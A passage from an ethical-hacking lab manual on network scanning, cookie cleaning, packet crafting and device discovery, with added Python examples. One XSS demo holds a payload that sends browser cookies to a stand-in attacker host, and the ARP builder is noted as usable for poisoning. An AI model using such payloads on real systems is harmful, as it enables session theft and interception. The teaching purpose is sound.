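    mac = "-".join("%02X" % b for b in pkt[pos:pos + 6])
    return {"txid": txid, "names": names, "mac": mac}


def demo() -> dict:
    """Constructed sample host; hostname, workgroup and MAC are placeholders."""
    reply = build_node_status_response(0x1234, [
        ("SAMPLE-PC", 0x00, 0x0400),   # unique, active: workstation name
        ("WORKGROUP", 0x00, 0x8400),   # group, active: the workgroup/domain name
        ("SAMPLE-PC", 0x20, 0x0400),   # unique, active: file server service
    ], bytes.fromhex("00155d000701"))
    return parse_node_status_response(reply)


if __name__ == "__main__":
    result = demo()
    for n in result["names"]:
        kind = "GROUP " if n["group"] else "UNIQUE"
        print(f"{n['name']:<15} <{n['suffix']:02X}> {kind} {n['service']}")
    print("Adapter address:", result["mac"])
```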
FIGURE 15.7: MegaPing NetBIOS Scanning Report
10. Right-click the IP address. In this lab, the selected IP is 10.0.0.4; it will be different in your network.
11. Then, from the context menu, select the Traceroute option.
MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more.
Scan results can be saved in HTML or TXT reports, which can be used to secure your network, for example, by shutting down unnecessary ports, closing shares, etc.
TASK 3: Traceroute
FIGURE 15.8: MegaPing Traceroute
12. It will open the Traceroute window and trace the IP address selected.
FIGURE 15.9: MegaPing Traceroute Report
13. Select Port Scanner from the left pane, add www.certifiedhacker.com in the Destination Address List, and then click the Start button.
14. After clicking the Start button, it toggles to Stop.
15. It lists the ports associated with www.certifiedhacker.com with the keyword, risk, and port number.
Other features include a multithreaded design that allows it to process any number of requests in any tool at the same time, real-time network connections status and protocols statistics, real-time process information and usage, real-time network information, including network connections and open network files, system tray support, and more.
TASK 4: Port Scanning
FIGURE 15.10: MegaPing Port Scanning Report
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: MegaPing
Information Collected/Objectives Achieved:
IP Scan Range: 10.0.0.1 to 10.0.0.254
Performed Actions:
■ IP Scanning
■ NetBIOS Scanning
■ Traceroute
■ Port Scanning
Result:
■ List of Active Hosts
■ NetBIOS Name
■ Adapter Name
MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. How does MegaPing detect security vulnerabilities on the network?
2. Examine the report generation of MegaPing.
Internet Connection Required: [ ] Yes [x] No
Platform Supported: [x] Classroom [x] iLabs
Lab
Detect, Delete and Block Google
Cookies Using G-Zapper
G-Zapper is a utility to block Google cookies, clean Google cookies, and help you stay anonymous while searching online.
Lab Scenario
You have learned in the previous lab that MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. It provides detailed information about all computers and network appliances. It scans your entire network and provides information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML or TXT reports, which can be used to secure your network.
As an administrator, you can organize safety measures by shutting down unnecessary ports, closing shares, etc. to block attackers from intruding into the network. As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history.
Lab Objectives
This lab explains how G-Zapper automatically detects and cleans the Google cookie each time you use your web browser.
Lab Environment
To carry out the lab, you need:
■ G-Zapper, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Anonymizers\G-Zapper
■ You can also download the latest version of G-Zapper from the link http://www.dummysoftware.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Install G-Zapper in Windows Server 2012 by following the wizard-driven installation steps
■ Administrative privileges to run tools
■ A computer running Windows Server 2012
Lab Duration
Time: 10 Minutes
Overview of G-Zapper
G-Zapper helps protect your identity and search history. G-Zapper will read the Google cookie installed on your PC, display the date it was installed, determine how long your searches have been tracked, and display your Google searches. G-Zapper allows you to automatically delete or entirely block the Google search cookie from future installation.
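The overview says G-Zapper reads the Google cookie, shows when it was installed and how long searches have been tracked, and deletes it. The Python below is an added example of those steps against a Firefox cookies.sqlite database, not G-Zapper's own code: it works on a subset of the moz_cookies columns (creationTime is microseconds since the Unix epoch), reports the install time and hours tracked for each google.com cookie, deletes those cookies, and returns a log line in the "(Browser) path date" shape of the cleaned-cookies log shown later in this lab. The database contents, the PREF cookie name and the google.com host rule are constructed assumptions, and Chrome's cookie store uses a different schema that this example does not cover.

```python
import sqlite3
from datetime import datetime, timezone

# Subset of Firefox's cookies.sqlite moz_cookies table (assumption: column names
# as in Firefox; creationTime and lastAccessed are microseconds since the epoch).
SCHEMA = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY,
    baseDomain TEXT,
    name TEXT,
    value TEXT,
    host TEXT,
    path TEXT,
    expiry INTEGER,
    lastAccessed INTEGER,
    creationTime INTEGER,
    isSecure INTEGER,
    isHttpOnly INTEGER
)
"""
US_PER_HOUR = 3_600_000_000


def open_cookie_db(path=":memory:"):
    """Open a cookies.sqlite file (or an empty in-memory database for the demo)."""
    conn = sqlite3.connect(path)
    conn.row_factory = sqlite3.Row
    return conn


def seed_sample(conn, now_us):
    """Constructed data: a google.com identifier cookie set 13 hours ago and an
    unrelated session cookie that the cleanup must leave alone."""
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO moz_cookies VALUES (?,?,?,?,?,?,?,?,?,?,?)",
        [
            (1, "google.com", "PREF", "ID=0123456789abcdef", ".google.com", "/",
             now_us // 1_000_000 + 365 * 86400, now_us, now_us - 13 * US_PER_HOUR, 0, 0),
            (2, "example.org", "session", "s3cr3t", "www.example.org", "/",
             now_us // 1_000_000 + 3600, now_us, now_us - 60 * 1_000_000, 1, 1),
        ],
    )
    conn.commit()


def find_google_cookies(conn):
    """Cookies scoped to google.com or any of its subdomains (assumed host rule)."""
    return conn.execute(
        "SELECT id, name, host, creationTime FROM moz_cookies WHERE host = ? OR host LIKE ?",
        ("google.com", "%.google.com"),
    ).fetchall()


def tracking_report(conn, now_us):
    """What the main window shows: when each cookie was installed and how many
    hours of searches it could have tied together."""
    report = []
    for row in find_google_cookies(conn):
        report.append({
            "name": row["name"],
            "host": row["host"],
            "installed": datetime.fromtimestamp(row["creationTime"] / 1_000_000, tz=timezone.utc),
            "tracked_hours": (now_us - row["creationTime"]) // US_PER_HOUR,
        })
    return report


def delete_google_cookies(conn, db_path, browser="Firefox", now=None):
    """Remove the cookies and return (count, log line) in the
    '(Browser) <path> <date>' shape of the cleaned-cookies log."""
    ids = [(row["id"],) for row in find_google_cookies(conn)]
    conn.executemany("DELETE FROM moz_cookies WHERE id = ?", ids)
    conn.commit()
    stamp = (now or datetime.now()).strftime("%A, %B %d, %Y %I:%M:%S %p")
    return len(ids), f"({browser}) {db_path} {stamp}"


def demo():
    """Run detect, report and delete against the constructed sample with a
    fixed clock (5 September 2012, 13:00 UTC) so the result is reproducible."""
    now_us = 1_346_850_000_000_000
    db = open_cookie_db()
    seed_sample(db, now_us)
    report = tracking_report(db, now_us)
    count, line = delete_google_cookies(db, r"C:\sample\cookies.sqlite",
                                        now=datetime(2012, 8, 31, 10, 42, 13))
    remaining = [r["name"] for r in db.execute("SELECT name FROM moz_cookies ORDER BY id")]
    return report, count, line, remaining


if __name__ == "__main__":
    report, count, line, remaining = demo()
    for entry in report:
        print(f"{entry['name']} on {entry['host']}: installed {entry['installed']:%c} UTC, "
              f"tracked for {entry['tracked_hours']} hours")
    print(f"deleted {count} cookie(s); log: {line}; left untouched: {remaining}")
```

Deleting only the rows matched by the host rule is the important design choice: a cleanup that truncates the whole table would also remove the unrelated session cookie, which is the dif
ference between "clean the Google cookie" and "log the user out of everything".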
Lab Tasks
TASK 1: Detect & Delete Google Cookies
1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.
FIGURE 16.1: Windows Server 2012 - Desktop view
2. Click the G-Zapper app to open the G-Zapper window.
FIGURE 16.2: Windows Server 2012 - Apps
3. The G-Zapper main window will appear as shown in the following screenshot.
FIGURE 16.3: G-Zapper main window
4. To delete the Google search cookies, click the Delete Cookie button; a window will appear that gives information about the deleted cookie location. Click OK.
G-Zapper is compatible with Windows 95, 98, ME, NT, 2000, XP, Vista, Windows 7.
A new cookie will be generated upon your next visit to Google, breaking the chain that relates your searches.
FIGURE 16.4: Deleting search cookies
5. To block the Google search cookie, click the Block Cookie button. A window will appear asking if you want to manually block the Google cookie. Click Yes.
FIGURE 16.5: Block Google cookie
6. It will show a message that the Google cookie has been blocked. To verify, click OK.
The tiny tray icon runs in the background, takes up very little space and can notify you by sound & animation when the Google cookie is blocked.
FIGURE 16.6: Block Google cookie (2)
7. To test that the Google cookie has been blocked, click the Test Google button.
8. Your default web browser will now open to Google's Preferences page. Click OK.
FIGURE 16.7: Cookies disabled message
9. To view the deleted cookie information, click the Settings button, and click View Log under Cleaned Cookies Log.
G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It's far too easy for someone using your PC to get a glimpse of what you've been searching for.
You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy.
FIGURE 16.8: Viewing the deleted logs
10. The deleted cookies information opens in Notepad.
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 10:42:13 AM
(Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies Friday, August 31, 2012 11:04:20 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 11:06:23 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Wednesday, September 05, 2012 02:52:38 PM
FIGURE 16.9: Deleted logs Report
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: G-Zapper
Information Collected/Objectives Achieved:
Action Performed:
■ Detect the cookies
■ Delete the cookies
■ Block the cookies
Result: Deleted cookies are stored in C:\Users\Administrator\Application Data
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine how G-Zapper automatically cleans Google cookies.
2. Check whether G-Zapper is blocking cookies on sites other than Google.
Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
Lab
Scanning the Network Using the Colasoft Packet Builder
The Colasoft Packet Builder is a useful tool for creating custom network packets.
Lab Scenario
In the previous lab you learned how to detect, delete, and block cookies. Attackers exploit XSS vulnerabilities by pushing malicious JavaScript code into a web application. When another user visits a page carrying that code, the user's browser executes it; the browser has no way of telling legitimate script from malicious script. Injected code is another mechanism an attacker can use for session hijacking: by default, cookies stored by the browser can be read by JavaScript, so the injected code can read a user's cookies and transmit them to the attacker. (Cookies set with the HttpOnly attribute are the exception: script cannot read them, which is why session cookies should carry it.)
As an expert ethical hacker and penetration tester you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields; encoding input and output and filtering meta-characters in the input; and using a web application firewall to block the execution of malicious script.
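The cookie-theft path and two of the defenses just listed, as an added Python example that is not code from the lab manual: output encoding of untrusted input (the browser then sees text, not markup), and a session cookie issued with the HttpOnly, Secure and SameSite attributes so injected script cannot read it. The payload, the host name attacker.test and the function names are constructed for illustration.

```python
"""Output encoding versus raw concatenation, and a hardened session cookie.
Added example for the lab scenario; not code from the lab or any vendor."""
import html
from http.cookies import SimpleCookie

# Constructed attacker input: script that ships document.cookie to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="http://attacker.test/?c="+document.cookie</script>'


def render_comment_vulnerable(comment: str) -> str:
    """'Before': untrusted text is concatenated straight into the HTML, so a
    <script> tag in the comment becomes a live script for every visitor."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """'After': every HTML meta-character (<, >, &, quotes) in the input is
    encoded, so the same payload is displayed as literal text."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def contains_active_markup(page: str) -> bool:
    """Crude check a tester can run on a rendered page: is a <script> tag present?"""
    return "<script" in page.lower()


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Set-Cookie value for a session id that script cannot read (HttpOnly),
    that is only sent over TLS (Secure) and never on cross-site requests
    (SameSite=Strict).  Uses the standard-library cookie serializer."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = secure      # False omits the flag (e.g. plain-HTTP test rigs)
    jar["session"]["samesite"] = "Strict"
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))   # live script: cookie exfiltration
    print(render_comment_safe(PAYLOAD))         # inert text
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```

Note that encoding protects the page that renders the comment, while HttpOnly protects the cookie even if some other page is still injectable; the two defenses are independent and both belong in a fix.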
Another method of vulnerability checking is to craft packets and send them into the network using the Colasoft Packet Builder. In this lab you will build a custom packet (an ARP request in the walkthrough) and send it onto the wire; crafted packets of this kind underlie packet sniffing tests, ARP poisoning, network spoofing, and DNS poisoning, and they let you verify that your defenses notice such traffic.
Lab Objectives
The objective of this lab is to reinforce concepts of network security policy, policy enforcement, and policy audits.
Lab Environment
In this lab, you need:
■ Colasoft Packet Builder located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Custom Packet Creator\Colasoft Packet Builder
■ A computer running Windows Server 2012 as host machine
■ Windows 8 running on a virtual machine as target machine
■ You can also download the latest version of Colasoft Packet Builder from http://www.colasoft.com/download/products/download_packet_builder.php
■ If you decide to download the latest version, then the screenshots shown in the lab might differ.
■ A web browser with Internet connection running on the host machine
Lab Duration
Time: 10 Minutes
Overview of Colasoft Packet Builder
Colasoft Packet Builder creates and sends custom network packets. This tool can be used to verify network protection against attacks and intruders. Its decoding editor lets you edit specific protocol field values directly, without hand-calculating byte offsets.
You can edit a packet in two editors, the Decode Editor and the Hex Editor, and start from any of the provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet.
Lab Tasks
TASK 1: Scanning Network
1. Install and launch the Colasoft Packet Builder.
2. Launch the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 17.1: Windows Server 2012 - Desktop view
3. Click the Colasoft Packet Builder 1.0 app to open the Colasoft Packet Builder window.
You can download Colasoft Packet Builder from http://www.colasoft.com.
[Screenshot: Windows Server 2012 Start screen showing the Colasoft Packet Builder 1.0 tile among the installed apps.]
FIGURE 17.2: Windows Server 2012 - Apps
4. The Colasoft Packet Builder main window appears.
[Screenshot: Colasoft Packet Builder main window: File, Edit, Send and Help menus; Import, Export, Add, Insert, Checksum and Adapter toolbar buttons; Decode Editor (no packet selected), Hex Editor and Packet List (Packets 0, Selected 0) panes.]
FIGURE 17.3: Colasoft Packet Builder main screen
5. Before starting your task, check that the Adapter settings are set to default and then click OK.
Operating system requirements: Windows Server 2003 and 64-bit Edition; Windows 2008 and 64-bit Edition; Windows 7 and 64-bit Edition.
Select Adapter dialog (values shown for the lab machine):
Physical Address: D4:BE:D9:C3:CE:2D
Link Speed: 100.0 Mbps
Max Frame Size: 1500 bytes
IP Address: 10.0.0.7/255.255.255.0
Default Gateway: 10.0.0.1
Adapter Status: Operational
FIGURE 17.4: Colasoft Packet Builder Adapter settings
6. To add or create the packet, click Add in the toolbar.
[Screenshot: toolbar with Import, Export, Add and Insert buttons above the Decode Editor.]
FIGURE 17.5: Colasoft Packet Builder creating the packet
7. When the Add Packet dialog box pops up, select the template and click OK.
Add Packet dialog: Select Template: ARP Packet; Delta Time: 0.1 Second.
There are two ways to create a packet, Add and Insert. The difference between them is the new packet's position in the Packet List: an added packet is listed last, whereas an inserted packet is placed after the current packet.
Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and *.cpf (Capsa 4.0 Packet File) formats. You may also import data from *.cap (Network Associates Sniffer packet files), *.pkt (EtherPeek v7/TokenPeek/AiroPeek v9/OmniPeek v9 packet files), *.dmp (TCPDUMP), and *.rawpkt (raw packet files).
FIGURE 17.6: Colasoft Packet Builder Add Packet dialog box
8. The added packets appear in the Packet List on the right-hand side of the window.
TASK 2: Decode Editor
9. Colasoft Packet Builder allows you to edit the decoding information in two editors: the Decode Editor and the Hex Editor.
Packet List (Packets 1, Selected 1): No. 1, Delta Time 0.100000, Source 00:00:00:00:00:00, Destination FF:FF:FF:FF:FF:FF
FIGURE 17.7: Colasoft Packet Builder Packet List
Decode Editor
Packet: Num: 000001  Length: 64  Captured: ...
Ethernet Type II [0/14]
    Destination Address: FF:FF:FF:FF:FF:FF [0/6]
    Source Address: 00:00:00:00:00:00 [6/6]
    Protocol: 0x0806 (ARP) [12/2]
ARP - Address Resolution Protocol [14/28]
    Hardware Type: 1 (Ethernet) [14/2]
    Protocol Type: 0x0800 [16/2]
    Hardware Address Length: 6 [18/1]
    Protocol Address Length: 4 [19/1]
    Type: 1 (ARP Request) [20/2]
    Source Physical: 00:00:00:00:00:00 [22/6]
    Source IP: 0.0.0.0 [28/4]
    Destination Physical: 00:00:00:00:00:00 [32/6]
    Destination IP: 0.0.0.0 [38/4]
Extra Data: [42/18]
    Number of Bytes: 18 bytes [42/18]
FCS: 0xF577BDD9
(Each [offset/length] pair is the field's byte offset and length within the frame. The 18 bytes of Extra Data are the zero padding that brings the 42-byte Ethernet+ARP packet up to the 60-byte Ethernet minimum; the 4-byte FCS follows it.)
Burst Mode option: if you check this option, Colasoft Packet Builder sends packets one after another without pause. If you want to send packets at their original delta time, do not check this option.
FIGURE 17.8: Colasoft Packet Builder Decode Editor
Hex Editor (Total 60 bytes)
0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 06
000E 00 01 08 00 06 04 00 01 00 00 00 00 00 00
001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
002A 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0038 00 00 00 00
FIGURE 17.9: Colasoft Packet Builder Hex Editor
10. To send all packets at one time, click Send All on the toolbar.
11. Check the Burst Mode option in the Send All Packets dialog window, and then click Start.
[Screenshot: toolbar with Send All, Send and Checksum buttons above the Packet List: No. 1, Delta Time 0.100000, Source 00:00:00:00:00:00, Destination FF:FF:FF:FF:FF:FF.]
Option, Loop Sending: this defines how many times the sending run is repeated, once by default. Enter zero if you want to keep sending packets until you pause or stop it manually.
FIGURE 17.10: Colasoft Packet Builder Send All button
Select a packet from the packet listing to activate the Send All button.
FIGURE 17.11: Colasoft Packet Builder Send All Packets
12. Click Start.
Send All Packets dialog:
Adapter: Realtek PCIe GBE Family Controller
Options: Burst Mode (no delay between packets); Loop Sending: 1 loops (zero for infinite loop); Delay Between Loops: 1000 milliseconds
Sending Information: Total Packets: 1; Packets Sent: 1; Progress bar
Buttons: Start, Stop, Close, Help
The progress bar presents an overview of the sending process you are engaged in at the moment.
FIGURE 17.12: Colasoft Packet Builder Send All Packets
13. To export the packets sent, from the File menu select File > Export > All Packets.
[Screenshot: File menu with Import..., Export > All Packets... / Selected Packets..., and Exit.]
FIGURE 17.13: Export All Packets option
[Screenshot: Save As dialog; File name: Packets.cscpkt; Save as type: Colasoft Packet File (v6) (*.cscpkt).]
FIGURE 17.14: Select a location to save the exported file
FIGURE 17.15: Colasoft Packet Builder exporting packet (Packets.cscpkt)
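The frame shown in the Decode Editor and Hex Editor of step 9, rebuilt byte by byte in Python as an added example that is not code from the lab or from Colasoft: it packs the Ethernet II header and the 28-byte ARP request, pads to the 60-byte minimum (the 18 bytes Packet Builder reports as Extra Data; the NIC appends the FCS), renders the same 14-bytes-per-row hex dump, and parses a frame back into the Decode Editor's fields, rejecting anything that is not Ethernet II + ARP. The second frame uses the lab adapter's MAC and IP (D4:BE:D9:C3:CE:2D, 10.0.0.7) and gateway (10.0.0.1) from Figure 17.4; the function names are this example's own.

```python
"""Build, dump and decode the Ethernet II / ARP frame from the lab's Decode Editor.
Added example; not Colasoft's code and not part of the original lab."""
import struct

ETHERTYPE_ARP = 0x0806
ETH_MIN_PAYLOAD = 46   # Ethernet II payload is padded to 46 bytes (60-byte frame before FCS)


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_frame(src_mac, src_ip, dst_mac, dst_ip, opcode=1,
                    eth_dst="FF:FF:FF:FF:FF:FF", eth_src=None, pad=True) -> bytes:
    """Raw Ethernet II frame carrying an ARP packet (opcode 1 = request, 2 = reply).
    Zero-padded to the 60-byte minimum: the 18 pad bytes are the 'Extra Data'
    the Decode Editor shows for the template packet."""
    eth_src = src_mac if eth_src is None else eth_src
    eth_hdr = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)   # htype, ptype, hlen, plen, oper
    arp += mac_bytes(src_mac) + ip_bytes(src_ip) + mac_bytes(dst_mac) + ip_bytes(dst_ip)
    if pad and len(arp) < ETH_MIN_PAYLOAD:
        arp += b"\x00" * (ETH_MIN_PAYLOAD - len(arp))
    return eth_hdr + arp


def decode_arp_frame(frame: bytes) -> dict:
    """Parse a frame back into the fields the Decode Editor displays.
    Raises ValueError for anything that is not a well-formed Ethernet II + ARP frame."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet II + ARP")
    dst, src = frame[0:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04X}")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol combination")
    if oper not in (1, 2):
        raise ValueError(f"unexpected ARP opcode {oper}")
    return {
        "eth_dst": mac_str(dst), "eth_src": mac_str(src), "ethertype": ethertype,
        "opcode": "request" if oper == 1 else "reply",
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
        "extra_bytes": len(frame) - 42,        # padding after the ARP packet
    }


def hexdump(frame: bytes, width: int = 14) -> list:
    """Rows in the same layout as Packet Builder's Hex Editor (offset + 14 bytes per row)."""
    return [f"{off:04X} " + " ".join(f"{b:02X}" for b in frame[off:off + width])
            for off in range(0, len(frame), width)]


# The lab's ARP Packet template: all-zero addresses, broadcast Ethernet destination.
LAB_TEMPLATE = build_arp_frame("00:00:00:00:00:00", "0.0.0.0",
                               "00:00:00:00:00:00", "0.0.0.0")

if __name__ == "__main__":
    print("\n".join(hexdump(LAB_TEMPLATE)))
    print(decode_arp_frame(LAB_TEMPLATE))
    # A request that would actually resolve the lab gateway from the lab adapter (Figure 17.4).
    probe = build_arp_frame("D4:BE:D9:C3:CE:2D", "10.0.0.7", "00:00:00:00:00:00", "10.0.0.1")
    print(decode_arp_frame(probe))
```

Comparing the rows produced for LAB_TEMPLATE with the Hex Editor dump above is a quick way to confirm the field offsets in the Decode Editor; the same builder, given a spoofed sender MAC and opcode 2, produces the kind of gratuitous reply that ARP poisoning relies on, which is exactly the traffic a network IDS should be able to flag.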
Lab Analysis
Analyze and document the results related to the lab exercise.
Tool/Utility: Colasoft Packet Builder
Information Collected/Objectives Achieved:
Adapter Used: Realtek PCIe GBE Family Controller
Selected Packet Template: ARP Packet
Result: The crafted packets are exported to Packets.cscpkt
Option, Packets Sent: this shows the number of packets sent successfully. Colasoft Packet Builder also displays the packets that were not sent, if any.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze how Colasoft Packet Builder affects your network traffic while you analyze your network.
2. Evaluate what types of instant messages Capsa monitors.
3. Determine whether the packet buffer affects performance. If yes, what steps do you take to avoid or reduce its effect on the software?
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Lab
Scanning Devices in a Network Using The Dude
The Dude automatically scans all devices within specified subnets, draws and lays out a map of your networks, monitors services of your devices, and alerts you in case some service has problems.
Lab Scenario
In the previous lab you learned how packets can be crafted and sent using Colasoft Packet Builder. Attackers, too, can sniff, capture, and analyze packets from a network and obtain specific network information. An attacker can then disrupt communication between hosts and clients by modifying system configurations, or through physical destruction of the network.
As an expert ethical hacker, you should be able to gather information on an organization's network to check for vulnerabilities and fix them before an attacker gets to compromise the machines using those vulnerabilities. If you detect that an attack has been performed on a network, immediately implement preventive measures to stop any additional unauthorized access.
In this lab you will learn to use The Dude to scan the devices in a network; the tool then monitors their services and alerts you when a monitored service stops responding, which can be the first visible sign of an attack.
Lab Objectives
The objective of this lab is to demonstrate how to scan all devices within specified subnets, draw and lay out a map of your networks, and monitor services on the network.
Lab Environment
To carry out the lab, you need:
■ The Dude, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\The Dude
■ You can also download the latest version of The Dude from http://www.mikrotik.com/thedude.php
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click The Dude installer and follow the wizard-driven installation steps to install The Dude
■ Administrative privileges to run tools
Lab Duration
Time: 10 Minutes
Overview of The Dude
The Dude network monitor is an application that can dramatically improve the way you manage your network environment. It automatically scans all devices within specified subnets, draws and lays out a map of your networks, monitors services of your devices, and alerts you in case some service has problems.
Lab Tasks
TASK 1: Launch The Dude
1. Launch the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 18.1: Windows Server 2012 - Desktop view
2. In the Start menu, click The Dude icon to launch The Dude.
FIGURE 18.2: Windows Server 2012 - Start menu
3. The main window of The Dude appears (admin@localhost - The Dude 4.0beta3).
[Screenshot: The Dude main window with the Preferences, Local Server and Help menus; the Settings, Discover, Tools and Layout toolbar; and the Contents tree: Address Lists, Admins, Agents, Charts, Devices, Files, Functions, History Actions, Links, Logs (Action, Debug, Event, Syslog), Mib Nodes, Network Maps (Local), Networks, Notifications, Panels, Probes, Services, Tools.]
FIGURE 18.3: Main window of The Dude
4. Click the Discover button on the toolbar of the main window.
FIGURE 18.4: Select discover button
5. The Device Discovery window appears.
Device Discovery window (tabs: General, Services, Device Types, Advanced):
Scan Networks: 10.0.0.0/24 (enter the subnet number you want to scan for devices)
Agent: default
Add Networks To Auto Scan (check box)
Black List: none
Device Name Preference: DNS, SNMP, NETBIOS, IP
Discovery Mode: (•) fast (scan by ping)  ( ) reliable (scan each service)
Recursive Hops: slider from 0 to 50
Layout Map After Discovery Complete (check box)
Buttons: Discover, Cancel
FIGURE 18.6: Device discovery window
6. In the Device Discovery window, specify the Scan Networks range, select default from the Agent drop-down list, select DNS, SNMP, NETBIOS, IP from the Device Name Preference drop-down list, and click Discover.
[Screenshot: Device Discovery window filled in as above: Scan Networks 10.0.0.0/24, Agent default, Black List none, Device Name Preference DNS, SNMP, NETBIOS, IP, Discovery Mode fast (scan by ping).]
FIGURE 18.7: Selecting device name preference
7. Once the scan is complete, all the devices connected to the scanned network are displayed on the map.
[Screenshot: Local network map after discovery showing the discovered Windows hosts by name (WIN-... computer names, ADMIN) with their current utilisation, e.g. cpu 19% mem 63% virt 27% disk 75%, beside the Contents tree.]
FIGURE 18.8: Overview of network connection
8. Select a device and hover the mouse cursor over it to display detailed information about that device.
[Screenshot: tooltip for a selected device showing its computer name, IP address 10.0.0.9, MAC address, uptime, operating system description (Windows), and history charts of CPU, memory, virtual memory and disk usage.]
FIGURE 18.9: Detailed information of the device
9. Now click the down arrow of the Local drop-down list to see information on History Actions, Tools, Files, Logs, and so on.
FIGURE 18.10: SelectingLocalinformation
10. Select options from the drop-down list to view complete information.
[Screenshot: the Logs pane listing timestamped "Element changed" events for the Network Map, and the Devices pane listing each discovered host (by IP address or computer name) with its agent, Local.]
FIGURE 18.11: Scanned network complete information
11. As described previously, you may select any of the other options from the drop-down list to view the respective information.
12. Once scanning is complete, click the Disconnect button.
[Screenshot: admin@localhost - The Dude 4.0beta3 with the Local network map showing the discovered hosts (WIN-... computer names, ADMIN, 10.0.0.x addresses) and their cpu, mem, virt and disk utilisation, with the Contents tree on the left.]
FIGURE 18.12: Connection of systems in network
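The discovery options set in step 6 (Scan Networks, fast or reliable mode, Device Name Preference, Black List, Recursive Hops) modelled in Python as an added example. This is not The Dude's code and not MikroTik's: the alive, resolve and neighbours callables are hypothetical hooks so the engine can run offline against the constructed fixture below (no host or name in it comes from the lab network), and tcp_probe is a real connect-based "reliable" probe you can plug in to run it against a live subnet you are authorised to scan.

```python
"""Subnet discovery in the style of The Dude's Device Discovery dialog.
Added example; not code from the lab, The Dude, or MikroTik."""
import ipaddress
import socket
from typing import Dict, Iterable, List

NAME_PREFERENCE = ("DNS", "SNMP", "NETBIOS", "IP")    # the order chosen in step 6
RELIABLE_PORTS = (22, 23, 80, 135, 139, 161, 443, 445)  # services a 'reliable' scan would try


def tcp_probe(ip: str, port: int, timeout: float = 0.3) -> bool:
    """Real probe for 'reliable' mode: True if a TCP connect to ip:port succeeds."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


def reliable_alive(ip: str, ports=RELIABLE_PORTS) -> bool:
    """'reliable (scan each service)': a host counts as up if any service answers."""
    return any(tcp_probe(ip, p) for p in ports)


def pick_name(ip: str, names: Dict[str, str], preference=NAME_PREFERENCE) -> str:
    """Device Name Preference: first non-empty name in order; 'IP' always resolves."""
    for source in preference:
        if source == "IP":
            return ip
        if names.get(source):
            return names[source]
    return ip


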